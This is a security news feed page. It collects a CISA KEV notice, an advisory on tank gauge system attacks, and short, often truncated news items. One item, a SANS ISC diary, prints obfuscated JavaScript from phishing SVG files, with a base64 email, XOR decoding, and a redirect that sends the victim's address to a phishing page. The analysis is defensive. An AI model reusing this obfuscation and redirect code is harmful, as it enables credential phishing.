Security & IT News

Miami Beach, FL, USA, 2nd June 2026, CyberNewswire

p CISA has added two new vulnerabilities to its nbsp; a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" Known Exploited Vulnerabilities (KEV) Catalog /a , based on evidence of active exploitation. /p ul type="disc" li a href="https://www.cve.org/CVERecord?id=CVE-2022-0492" target="_blank" CVE-2022-0492 /a Linux Kernel Improper Authentication Vulnerability /li li a href="https://www.cve.org/CVERecord?id=CVE-2025-48595" target="_blank" CVE-2025-48595 /a Android Framework Integer Overflow Vulnerability /li /ul p These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risks to the federal enterprise. /p p a href="https://www.cisa.gov/binding-operational-directive-22-01" Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities /a established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the nbsp; a href="https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf" BOD 22-01 Fact Sheet /a for more information. /p p Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of nbsp; a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" KEV Catalog vulnerabilities /a as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the nbsp; a href="https://www.cisa.gov/known-exploited-vulnerabilities" specified criteria /a . /p

p a class="c-button" href="https://www.cisa.gov/sites/default/files/2026-06/fact-sheet-cisa-and-partners-urge-hardening-automatic-tank-gauge-systems_508c.pdf" CISA and Partners Urge Hardening Automatic Tank Gauge Systems /a /p h2 strong Overview /strong /h2 p The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Department of Energy (DOE), the Environmental Protection Agency (EPA), the Transportation Security Administration (TSA), the Department of Transportation (DOT), and the U.S. Department of Agriculture (USDA)—hereafter referred to as “the authoring organizations”—are aware of malicious cyber activity targeting U.S.-based automatic tank gauge (ATG) systems. ATG systems are widely used throughout the a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" Energy /a , a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/chemical-sector" Chemical /a , a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector" Food and Agriculture /a , and a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector" Transportation Systems /a Sectors for automated and remote monitoring of storage tank parameters, including fuel and liquid levels, temperature, and possible leak detection. The authoring organizations urge ATG owners and operators to defend against this malicious activity by securing their ATG systems with strong passwords and by removing them from the internet to reduce public exposure. nbsp; /p h2 strong Threat /strong /h2 p The recent malicious cyber activity observed by the authoring organizations—which the U.S. government has not yet attributed to a nation-state or threat actor group—involves cyber threat actors compromising internet-exposed ATG systems and subsequently modifying them through command execution. This fact sheet provides insight into probable tactics, techniques, and procedures (TTPs) leveraged by these cyber actors, highlights risk factors associated with such compromises, and provides mitigation guidance and resources to reduce the likelihood of continued malicious activity targeting U.S.-based ATG systems. nbsp; /p p Cyber threat actors may exploit flaws in ATG systems through multiple attack vectors: /p ul li strong Authentication Bypass and Hardcoded Credentials: /strong Threat actors gain unauthorized access to device management interfaces. nbsp; /li li strong OS Command Execution and Structured Query Language (SQL) Injection: /strong Threat actors execute arbitrary code and manipulate underlying databases. nbsp; /li li strong Privilege Escalation: /strong Threat actors achieve full administrator privileges over the device applicat

AI-driven exploitation timelines are rapidly shrinking, and they are not going to stop shrinking. Vulnerabilities are being discovered, reproduced, and weaponized faster than ever in the history of enterprise security. As a result, the window between a vulnerability being disclosed and indiscriminate exploitation observed across the internet is now measured in hours, not days. The industry's

Google has released the June 2026 Android security patches to address 124 vulnerabilities, including one zero-day flaw exploited in targeted attacks. [...]

As part of their 20th Anniversary celebration, Dark Reading asked five cybersecurity industry leaders who wrote blogs or columns for them over the years to select their favorite piece and share their reflections on the topic today. This is my section. Renowned technologist and author Bruce Schneier contributed a column on June 20, 2010, warning about cryptography’s inability to secure modern networks , a point he says he has been trying to argue since 2000. “For a while now, I’ve pointed out that cryptography is singularly ill-suited to solve the major network security problems of today: denial-of-service attacks, website defacement, theft of credit card numbers, identity theft, viruses and worms, DNS attacks, network penetration, and so on. “Recently, I talked to a former NSA employee at a conference. He told me that back in the 1990s, he had a copy of my book Applied Cryptography by his desk, as did many other cryptographers working at Ft. Meade. People were allowed to refer to it, but they were not allowed to cite it. “The 1990s were an important decade for cryptography. This was before the internet went mass market, when cryptography was just emerging from a niche academic discipline to a mainstream engineering one. There wasn’t much that programmers could read. The NSA used my book for the same reason it became a bestseller: because it collected all the academic cryptography of the time in one place and made it understandable to people who weren’t mathematicians. They feared it for exactly the same reason. “I’ve been thinking about that conversation as I revisit a 2010 essay I wrote for Dark Reading, ‘ The Failure of Cryptography to Secure Modern Networks .’ Cryptography has inherent mathematical properties that greatly favor the defender. Adding a single bit to the length of a key adds only a slight amount of work for the defender but doubles the amount of work the attacker has to do. Doubling the key length doubles the amount of work the defender has to do (if that—I’m being approximate here) but increases the attacker’s workload exponentially. For many years, we have exploited that mathematical imbalance. “Computer security is much more balanced. There’ll be a new attack, and a new defense, and a new attack, and a new defense. It’s an arms race between attacker and defender. And it’s a very fast arms race. New vulnerabilities are discovered all the time. The balance can tip from defender to attacker overnight, and back again the night after. Computer security defenses are inherently very fragile. “That isn’t a new idea. I said much the same thing in the preface to my 2000 book, Secrets and Lies : “‘Cryptography is a branch of mathematics. And like all mathematics, it involves numbers, equations, and logic. Security, real security that you or I might find useful in our lives, involves people: things people kno

An anonymous security researcher called “Nightmare Eclipse” has been publishing a series of significant security exploits against Microsoft Windows—including one that breaks BitLocker. Microsoft has threatened legal action against the researcher. Lots of recriminations are being traded back and forth.

A threat actor used AI coding tools to build and test EDR evasion malware, Sophos finds

Most organizations now recognize that endpoint protection alone is no longer sufficient. That's why adoption of endpoint detection and response (EDR) has accelerated rapidly in recent years. Organizations understand that modern attacks move faster, evade traditional prevention controls, and require continuous visibility into suspicious activity across the environment. But owning EDR

Attackers backdoored 32 packages in Red Hat's official npm scope to steal cloud and CI secrets

UK organizations are prioritizing AI-driven cybersecurity as 43% cite AI-powered attacks as their top risk, prompting significant investment in advanced threat defense

Cybersecurity researchers have disclosed details of a spear-phishing campaign likely undertaken by the Pakistan-aligned SideCopy group targeting Afghanistan's Ministry of Finance with an open-source remote access trojan called Xeno RAT. "The campaign opens with a spear phishing delivery - a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,"

A new Silobreaker and SANS Institute paper examines the ‘Intelligence-Stakeholder Gap’ and what organizations must do to achieve business buy-in on threat intelligence

For a few days, my SANS ISC mailbox is flooded with emails that delivers SVG files. An SVG ( Scalable Vector Graphic ) is a web-friendly vector file format used for graphics and icons. No URL in the body, just an image , that s the perfect way to deliver some malicious content. This isn t the first time that we see this technique used by threat actors[ 1 ]. This time, the SVG files are really simple and even don t contain any graphical element but a simple piece of JavaScript that will redirect the victim's browser to the phishing page: With the current wave, I just detected regular phishing pages but it could be any payload. The variable nl contains the targeted email address: nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // [email protected] The interesting payload is in oa , it contains a Base64-encode and XOR d string. The XOR key is in bd : const pt = b19208caeefa ; const rm = 51d1e7dcd384 ; const bd = pt + rm; The payload is decoded here: const cx = ['b', 'style', 'o', 't', 'a']; const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')]; const ts = kf(oa); const rabbit = Uint8Array.from(ts, (aa, ak) = aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length) ); Finally, the variable rabbit is used to perform the redirect in the browser: window.location.href = hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/ + [email protected] ; This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used ( .cfd ) which means Clothing, Fashion, and Design . It's a cheap TLD more and more abused in phishing campaigns[ 2 ]. A final note about the MIME type used in the SVG file: script type= application/ecmascript This is a official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[ 3 ]. This has been used probably to defeat some common security controls that are looking for JavaScript . [1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456 [2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d [3] https://github.com/sudheerj/ECMAScript-features Xavier Mertens (@xme) Xameco Senior ISC Handler - Freelance Cyber Security Consultant PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Password manager Dashlane has disclosed that "fewer than" 20 users on the personal subscription plan had their encrypted vaults downloaded following a brute-force attack launched by an unknown party. On May 31, 2026, the company said an "external" threat actor launched a brute-force attack against certain Dashlane user accounts with the aim of breaking two-factor authentication (2FA)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Consider the history of any recent corporate scandal, and it is quite possible to guess what the story…

A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites. [...]

More than 30 npm packages under Red Hat's '@redhat-cloud-services' namespace were compromised in a supply-chain attack that distributed a new variant of the Shai-Hulud credential-stealing malware, dubbed "Miasma." [...]

The Spanish National Police has arrested an individual for leaking sensitive information related to members of various key state organizations, including the National Cybersecurity Institute (INCIBE). [...]